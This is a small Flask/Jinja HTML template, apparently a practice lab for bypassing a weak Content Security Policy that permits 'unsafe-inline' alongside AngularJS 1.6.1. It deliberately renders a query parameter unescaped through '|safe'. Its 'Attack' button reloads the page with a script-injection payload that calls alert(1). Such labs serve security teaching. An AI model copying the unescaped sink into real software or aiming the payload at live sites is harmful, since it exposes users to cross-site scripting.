<html>
  <head>
    <meta http-equiv=content-security-policy content="object-src 'none'; script-src 'self' 'unsafe-inline';">
    <script src="{{ url_for('static', filename='angular-1.6.1/angular.min.js') }}"></script>
    <script src="{{ url_for('static', filename='tools/axios.min.js') }}"></script>
  </head>
  <body>
     <div>Try to attack Whitelist-based CSP which allows resources from the current origin but enables `unsafe-inline` with gadgets in AngularJS 1.6.1</div>
      {{inj|safe}}
    <button onclick="attack()">Attack</button> 
    <script>
      // let url = window.location.protocol + '//' + window.location.host;
      let url = window.location.href;
      let code = "{% raw %}?inj=<script>alert(1);<\/script>{% endraw %}"
      const attack = () => {
          window.location.replace(url+code);
      };
    </script>
  </body>
</html>
